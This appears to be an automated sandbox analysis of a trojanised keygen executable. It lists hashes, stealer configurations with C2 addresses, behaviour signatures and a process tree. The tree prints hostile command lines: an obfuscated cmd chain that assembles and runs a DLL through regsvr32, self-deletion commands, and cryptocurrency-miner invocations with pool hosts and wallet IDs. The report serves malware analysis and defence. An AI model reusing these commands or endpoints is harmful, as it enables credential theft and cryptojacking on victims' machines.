Analysis

  • max time kernel
    1579s
  • max time network
    1715s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    20-05-2021 20:35

General

  • Target

    Ccgetmac.Version.3.9.serial.keygen.exe

  • Size

    9.0MB

  • MD5

    6fc07da0a519310b03b1f5d848ca327d

  • SHA1

    af5271b735669ec632ecf18eca841c5b3fb1c4d0

  • SHA256

    47f381ac61e4b5279863c5fbf577a443554044d0ddb5e0c9f22bca25c9c413b3

  • SHA512

    f4c846db325768bc90a91e78d63cf1d8cdd12fc2e83853a20d54569927dd4addab75a0d8786400c12e831989408d42d015ac04d0e1fe47aad49f62ce199dbd17

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

e0aa5b6d2491c503baf06d4cfeb218de1cd41474

Attributes
  • url4cnc

    https://tttttt.me/hbackwoods1

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

ServLyla2

C2

87.251.71.4:80

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 15 IoCs
  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 42 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Ccgetmac.Version.3.9.serial.keygen.exe
    "C:\Users\Admin\AppData\Local\Temp\Ccgetmac.Version.3.9.serial.keygen.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1816
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1508
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:316
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1548
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
            5⤵
            • Executes dropped EXE
            PID:1720
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
        keygen-step-5.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:856
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c COPY /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ..\QWjHI.exe > nul && STart ..\QWjHI.exe -p27ynDU0RROn_1Esjj_BT3 & If "" =="" for %L IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /F /iM "%~NXL" > NuL
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:796
          • C:\Users\Admin\AppData\Local\Temp\QWjHI.exe
            ..\QWjHI.exe -p27ynDU0RROn_1Esjj_BT3
            5⤵
            • Executes dropped EXE
            PID:1008
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c COPY /y "C:\Users\Admin\AppData\Local\Temp\QWjHI.exe" ..\QWjHI.exe > nul && STart ..\QWjHI.exe -p27ynDU0RROn_1Esjj_BT3 & If "-p27ynDU0RROn_1Esjj_BT3 " =="" for %L IN ( "C:\Users\Admin\AppData\Local\Temp\QWjHI.exe" ) do taskkill /F /iM "%~NXL" > NuL
              6⤵
                PID:1812
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /C EcHO | SeT /p = "MZ" > VLtI.N & cOPY /B /y VLti.N + 6wVNLNJ.QO + 6Q1e.WHX + b~jVM.BED ..\NeNFc.Nt > Nul &stArT regsvr32 ..\NenfC.Nt /S & DeL /Q * > nuL
                6⤵
                  PID:872
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                    7⤵
                      PID:2076
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>VLtI.N"
                      7⤵
                        PID:2088
                      • C:\Windows\SysWOW64\regsvr32.exe
                        regsvr32 ..\NenfC.Nt /S
                        7⤵
                        • Loads dropped DLL
                        • Suspicious use of NtCreateThreadExHideFromDebugger
                        PID:2192
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /iM "keygen-step-5.exe"
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1612
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                keygen-step-1.exe
                3⤵
                • Executes dropped EXE
                PID:1632
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                keygen-step-3.exe
                3⤵
                • Executes dropped EXE
                PID:852
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                  4⤵
                    PID:1812
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 1.1.1.1 -n 1 -w 3000
                      5⤵
                      • Runs ping.exe
                      PID:2104
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                  keygen-step-4.exe
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:864
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Crack.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Crack.exe"
                    4⤵
                      PID:744
                      • C:\Windows\SysWOW64\rUNdlL32.eXe
                        "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",setuser
                        5⤵
                          PID:2184
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX3\ABCbrow.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\ABCbrow.exe"
                        4⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2396
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                          5⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:744
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1uJsd7
                            6⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            PID:2376
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2376 CREDAT:275457 /prefetch:2
                              7⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:936
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX3\jg6_6asg.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\jg6_6asg.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:656
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 656 -s 192
                          5⤵
                          • Loads dropped DLL
                          • Program crash
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: GetForegroundWindowSpam
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2468
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe
                      keygen-step-6.exe
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Modifies system certificate store
                      PID:760
                      • C:\Users\Admin\AppData\Roaming\9364.tmp.exe
                        "C:\Users\Admin\AppData\Roaming\9364.tmp.exe"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:2604
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\9364.tmp.exe"
                          5⤵
                            PID:1584
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /T 10 /NOBREAK
                              6⤵
                              • Delays execution with timeout.exe
                              PID:2484
                        • C:\Users\Admin\AppData\Roaming\B41E.tmp.exe
                          "C:\Users\Admin\AppData\Roaming\B41E.tmp.exe"
                          4⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of SetThreadContext
                          • Modifies system certificate store
                          PID:2680
                          • C:\Windows\system32\msiexec.exe
                            -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w399@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                            5⤵
                              PID:3028
                            • C:\Windows\system32\msiexec.exe
                              -o pool.minexmr.com:4444 -u 87rRyMkZM4pNgAZPi5NX3DdxksaoNgd7bZUBVe3A9uemAhxc8EQJ6dAPZg2mYTwoezgJWNfTpFFmnVYWXqcNDMhLF7ihFgM.w820 --cpu-max-threads-hint 50 -r 9999
                              5⤵
                              • Blocklisted process makes network request
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2084
                          • C:\Users\Admin\AppData\Roaming\B547.tmp.exe
                            "C:\Users\Admin\AppData\Roaming\B547.tmp.exe"
                            4⤵
                            • Executes dropped EXE
                            • Drops startup file
                            PID:2700
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe" >> NUL
                            4⤵
                              PID:2808
                              • C:\Windows\SysWOW64\PING.EXE
                                ping 127.0.0.1
                                5⤵
                                • Runs ping.exe
                                PID:2852
                      • C:\Windows\system32\conhost.exe
                        \??\C:\Windows\system32\conhost.exe "-612547857-1908221211-1904713462113111153118199831921407942907-6593363391157028012"
                        1⤵
                          PID:2088

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • memory/656-204-0x0000000000400000-0x00000000005DB000-memory.dmp

                          Filesize

                          1.9MB

                        • memory/744-207-0x0000000000920000-0x0000000000921000-memory.dmp

                          Filesize

                          4KB

                        • memory/744-198-0x0000000000400000-0x000000000041C000-memory.dmp

                          Filesize

                          112KB

                        • memory/744-200-0x0000000000400000-0x000000000041C000-memory.dmp

                          Filesize

                          112KB

                        • memory/760-85-0x0000000000170000-0x0000000000187000-memory.dmp

                          Filesize

                          92KB

                        • memory/1548-183-0x0000000000250000-0x0000000000262000-memory.dmp

                          Filesize

                          72KB

                        • memory/1548-127-0x0000000000EA0000-0x000000000103C000-memory.dmp

                          Filesize

                          1.6MB

                        • memory/1548-164-0x0000000001040000-0x000000000112F000-memory.dmp

                          Filesize

                          956KB

                        • memory/1548-181-0x0000000000270000-0x0000000000271000-memory.dmp

                          Filesize

                          4KB

                        • memory/1720-130-0x0000000000400000-0x0000000000983000-memory.dmp

                          Filesize

                          5.5MB

                        • memory/1720-116-0x0000000000400000-0x0000000000983000-memory.dmp

                          Filesize

                          5.5MB

                        • memory/1816-60-0x00000000752B1000-0x00000000752B3000-memory.dmp

                          Filesize

                          8KB

                        • memory/2084-194-0x0000000140000000-0x000000014070D000-memory.dmp

                          Filesize

                          7.1MB

                        • memory/2084-191-0x0000000140000000-0x000000014070D000-memory.dmp

                          Filesize

                          7.1MB

                        • memory/2084-206-0x0000000000580000-0x00000000005A0000-memory.dmp

                          Filesize

                          128KB

                        • memory/2192-195-0x0000000001E20000-0x0000000001EC2000-memory.dmp

                          Filesize

                          648KB

                        • memory/2192-196-0x0000000002020000-0x00000000020B0000-memory.dmp

                          Filesize

                          576KB

                        • memory/2192-156-0x0000000010000000-0x0000000010182000-memory.dmp

                          Filesize

                          1.5MB

                        • memory/2192-155-0x0000000001F10000-0x0000000002014000-memory.dmp

                          Filesize

                          1.0MB

                        • memory/2396-165-0x0000000000300000-0x0000000000309000-memory.dmp

                          Filesize

                          36KB

                        • memory/2396-153-0x00000000010C0000-0x00000000010C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2396-157-0x0000000000A50000-0x0000000000A51000-memory.dmp

                          Filesize

                          4KB

                        • memory/2468-208-0x00000000004B0000-0x00000000004B1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2604-182-0x0000000001CF0000-0x0000000001D81000-memory.dmp

                          Filesize

                          580KB

                        • memory/2604-184-0x0000000000400000-0x000000000049C000-memory.dmp

                          Filesize

                          624KB

                        • memory/2680-179-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

                          Filesize

                          8KB

                        • memory/2700-173-0x0000000000180000-0x0000000000185000-memory.dmp

                          Filesize

                          20KB

                        • memory/3028-190-0x0000000140000000-0x0000000140383000-memory.dmp

                          Filesize

                          3.5MB

                        • memory/3028-187-0x0000000140000000-0x0000000140383000-memory.dmp

                          Filesize

                          3.5MB